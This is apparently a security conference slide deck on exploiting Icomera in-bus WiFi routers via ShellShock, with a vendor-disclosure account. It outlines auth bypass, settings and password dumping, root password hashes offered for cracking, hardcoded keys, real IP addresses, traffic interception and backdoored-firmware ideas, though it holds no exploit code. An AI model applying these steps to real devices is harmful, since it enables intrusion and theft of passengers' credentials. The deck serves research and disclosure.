Upload
infodox
View
523
Download
1
Embed Size (px)
Citation preview
Shell on Wheels:
Darren Martyn
Xiphos [email protected]
Exploitation of endpoint wireless devices for mostly fun and possibly profit
whoami
• Darren Martyn / @infodox (twitter)
• Penetration Tester & Researcher @ Xiphos Research Ltd
• Forensics & Chemistry Student @ GMIT
what?
• Today we will look at owning those “free WiFi” access points on just about every bus ever.
• Sorry guys. Not Charlie Miller style bus owning here. Nothing explodes/catches fire/crashes.
• Still, will make bus rides a lot more fun!
Let’s explore the magic box!
• i486 Embedded Processor (so, x86)
• One or more (usually two) data cards for cell connectivity
• WiFi, Ethernet, GPS, serial
• Unfortunately, I was unable to acquire my own magic box
But firmware is good too!
• Via googling, came across a random FTP server containing 108 firmware images for these devices (courtesy of an engineer)
• Judicious application of wget. (anonymous login FTW)
• Now we have firmware images
find . –name “vuln”
• Took a fairly blind approach to finding vulns
• “Grep and gripe” kind of things
• First off, looked at the web interface of device
Some numbers
• All 108 were vulnerable to ShellShock
• All 108 had the same shitty CGI script
• 106 used thttpd rooting as root
• 2 ran lighttpd. Also as root
Going beyond Rootshells
• So we can execute code as root
• Leverage this to bypass auth and get at the web interface?
• Dump settings from the device?
• Persistent (firmware) rootkits?
Bypassing Auth
• Uses .htpasswd for auth
• Wrote a simple script to enable/disable auth
• Simply mv the .htpasswd to disable, mv back to re-enable
Dumping Settings
• With Auth bypassed, we can wget “moovbox.settings” from the device
• Sqlite3 database, contains passwords and such
• The Sqlite database was a mess, so I wrote a parser to dump the goods from it
Remote Settings Grabber
• Just for shits and giggles, I wrote an auto settings downloader
• Disable auth on device
• Dump database from device (save as md5sum of file)
• Re-enable auth on device
Further firmware analysis
• Lets look for more fun stuff in this firmware
• First off, we analyse the passwd files
• 4 unique hashes
The Hashes
• I have yet to crack these. People have been trying and failing for about a month. Can you succeed?
root:$1$5jjAfVIS$dIG6AvGNwq8EENjTHnfpK/
root:$1$jb.3W.1D$8FeBW.T/x2wwJVB.lp.gv1
root:$1$bw7WuzHj$aU6V7omf9zBWA2sEaJv9p1
root:$6$W74jOIhT$QaYoDDN.N1SRgyG5ALymJHcYc9TmXKcITXyCstG
DdK9cXOssLOTMQPl2uRm.wsNZ7oE5byOOrdNlvNxyguqVs/
SSH Keys
• Protip: Hardcoded SSH Keys Suck
• They all have /etc/ssh/ keys. RSA and DSA
• They also have the same /etc/ssh_key privkey, which is a bit unusual...
/etc/ssh_key
• Now, this is an odd one. It matches exactly two boxes in the wild – both hosts in Germany
• As to wtf these are, I have no idea
• If anyone can figure it out, it would be great ;)
• 89.110.151.186 & 89.110.148.26 (who is this?)
Let’s go after SSL keys…
• OpenVPN Keys: find . -name "*.key" (108)
> 2e465be3c06ea7db968347aaa3df7d37
> All identical
• SSL Keys: find . -name "*.pem" (973)
> Also the same…
SSL Keys
• 6 of them on each image. All identical across images:
> 7135ad5b7fd5fb2eb23f8dfecf74919d
> cb5199178e4649461928356c7cbdae74
> de2c6949bd1bca55c20d9610510a08d1
> 905a7590ee039a788a08d4dfd15d2582
> a926c2beaa439f37bc62a5678a4e5906
> 35a569e0e768495554c4cbddd787f9e4
God damn it – all the same?!?!
• These are also good for remote fingerprinting
• And probably traffic interception...
• “You guys are bad at this!” is the only apt response to the vendor
Owning the Client
• Interestingly, these devices do intercept HTTP(s) traffic
• This is for site blocking and to inject banner ads
• Seems to use Privoxy and some scripts to do this
(More) Owning the Client
• Devices all have this wonderful traffic interception suite
• Modify existing JS injector to inject BeEF, perhaps?
• Not tested for obvious reasons, but doable
(Yet More) Owning the Client
• These devices have libpcap installed
• Dropping a working packet sniffer is easy
• Sniff cleartext credentials over the wire... All their traffic is going through you!
Remember I said SSL interception?
• Some of these devices observed in the wild tamper with HTTPS traffic
• Self signed keys observed with SSL'd sites, etc.
• Seemingly generated from the keys stored on device
• Use your imagination
So what about rootkits?
• This is where it gets really fun. And fairly untested
• While attempting to repack firmware, I noticed there were two variants of image in there
• Variant 1 was just a raw CRAMFS image
• Variant 2 was [header][CRAMFS image]
Challenges
• So the raw CRAMFS one, we can just repack and upload
• The other one... I had to try make sense of the header
• This is untested on a live device, so don't try this unless you are willing to break stuff
Creating ‘doored firmware
• Add backdoors to extracted CramFS filesystem
• Repackage CramFS filesystem
• If needed, append the weird header so that CramFS magic starts at offset 0x64
Suggested Payloads for Modified Firmware
• Script Injector as mentioned previously using already existing code on the device!
• Traffic sniffer ala Linux\Flasher.A rootkit
• Remote shell/file xfer – “tshd” or similar with a hourly callbackto C2?
Some Conclusions
• These devices have no security
• If you use free WiFi on public transport, expect to be owned. (well, thats to be expected?)
• If you are a vendor of such devices, start taking security bloody seriously
Afterthoughts: Concerning Disclosure
• Tried emailing icomera, did not receive response
• Made repeated attempts with no success, however, normally when I try alert vendors about stuff they get annoying and irritable
Afterthoughts: Concerning Patching
• Icomera claim on their blog to have patched the ShellShockexploit
• However, as its up to end users to patch their boxen (no auto updater), this is kinda useless
• All the devices I see ITW are vulnerable still
• Raises concerns over Internet of Junk and updates
Thanks
• f1nux and the BsidesHN crew for making this event happen <3
• Co-workers for letting me off to do science and supporting it
• Various friends (you know who you are) for helping out
• Icomera, for making such a wonderful product I have something to talk about